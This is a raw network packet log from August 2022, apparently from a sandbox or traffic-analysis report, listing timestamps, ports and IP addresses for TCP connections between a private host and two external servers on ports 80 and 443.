Aug 23, 2022 03:42:57.275574923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275598049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275630951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275650024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275690079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275731087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275754929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275779963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275819063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275859118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275880098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275913000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275930882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275966883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275985003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276021957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276038885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276087046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276098013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276185036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276201010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276238918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276277065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276307106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276333094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.276361942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.276381969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.302836895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.302891016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.302925110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.302952051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.302987099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303030968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303051949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303093910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303136110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303155899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303196907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303237915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303263903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303289890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303313971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303371906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303395987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303445101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303457975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303492069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303529024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303587914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303616047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303668022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303724051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303739071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303787947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303807974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303849936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303891897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.303910971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303936005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.303961992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304002047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304040909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304059982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304094076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304121017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304150105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304191113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304215908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304255962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304299116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304317951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304344893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304368019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304408073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304445982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304464102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304497004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304611921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304680109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304719925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304749966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304785967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304826975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304861069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304893017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304932117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.304971933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.304986954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305018902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305097103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305135012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305165052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305212021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305227041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305248022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305263042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305298090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305337906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305358887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305394888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305408955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305445910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305469036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305510998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305547953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305561066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305591106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305634022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305675030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305691957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305732012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305807114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305830002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305847883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305876970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.305907965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305953979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.305967093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306005001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306025982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306066036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306107044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306123972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306155920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306195974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306219101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306258917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306297064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306315899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306350946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306364059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306404114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306444883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306463957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306494951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306520939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306566954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306579113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306610107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306637049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306675911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306704044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306727886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306751013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.306776047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.306843042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.736002922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.756218910 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:42:57.756272078 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:42:57.756382942 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:42:57.770328045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.860702991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.860749006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.860807896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.860868931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.860888004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.860924959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.860938072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861041069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.861263037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861354113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861392975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861454964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.861474991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.861536980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861649036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861710072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.861722946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.863024950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.892688036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892769098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892807961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892836094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892879963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892919064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892930984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.892962933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.892971039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.892982006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893004894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893045902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893048048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893064022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893088102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893116951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893121958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893157959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893165112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893182993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893198013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893213034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893237114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893270969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893327951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893387079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893413067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893429995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893460035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893495083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893686056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893723965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893755913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893765926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893793106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893804073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893843889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893860102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893872976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893874884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893910885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893913031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893922091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893954039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.893965006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.893994093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.894004107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.894023895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.894048929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.894073963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925149918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925218105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925257921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925312042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925314903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925342083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925350904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925375938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925422907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925456047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925479889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925503016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925546885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925548077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925599098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925635099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925658941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925661087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925714016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925730944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925770044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925791979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925817013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925834894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925879002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925884962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.925935030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.925944090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926007032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926048040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926089048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926115990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926151037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926177979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926224947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926250935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926270962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926316977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926326990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926333904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926384926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926390886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926456928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926462889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926501989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926553011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926564932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926609039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926624060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926683903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926738977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926748037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926798105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926856995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926857948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.926901102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.926925898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927002907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927062988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927083015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927118063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927190065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927251101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927258015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927314043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927319050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927406073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927417040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927467108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927508116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927545071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927561998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927563906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927617073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927628994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927678108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927680016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927731991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927738905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927789927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927797079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927849054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927851915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927900076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927912951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.927947044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.927968025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.928020954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.956913948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.956975937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957016945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957071066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957078934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957108021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957132101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957138062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957190037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957225084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957267046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957274914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957340956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957345963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957396984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957415104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957438946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957463980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957503080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957516909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957562923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957566023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957617044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957648039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957690001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957698107 CEST	80	49774	45.95.11.158	192.168.2.3
